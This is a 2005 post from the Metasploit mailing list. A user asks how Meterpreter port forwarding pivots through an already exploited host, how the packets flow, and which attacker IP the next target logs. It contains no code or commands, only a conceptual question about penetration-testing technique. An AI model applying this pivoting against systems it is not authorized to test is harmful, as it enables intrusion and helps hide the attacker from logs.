Metasploit mailing list archives

use of meterpreter (copy for the list )

From: thomas.werth at vahle.de (Thomas Werth)
Date: Thu, 14 Apr 2005 10:14:56 +0200

Lets see if i understand correctly :
Exploiting another host and using meterpreter is first i do.
Now the portfwd of meterpreter isn't running on victims host, instead it
is running on "my" host, correct ?
Now i setup portforwading using localhost and next desired target-ip.
When now running attack based on proxy protforwading does it job and
exploit should work , correct ?
Now my question for better understanding :
As portforwading is running on my host and target ip is different from
"proxy Host" why do i need to exploit the proxy host as it seems to me
this host isn't needed when using localhost and next target ip for
"proxy attack " ? How is the "flow of packets" ?
In case of logging on "next target host" which attacker ip will be logged ?

thxs for your help